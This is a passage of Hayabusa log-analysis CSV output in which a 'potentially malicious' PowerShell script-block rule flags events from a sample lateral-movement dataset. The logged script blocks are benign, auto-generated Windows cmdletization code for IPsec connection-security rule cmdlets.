[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 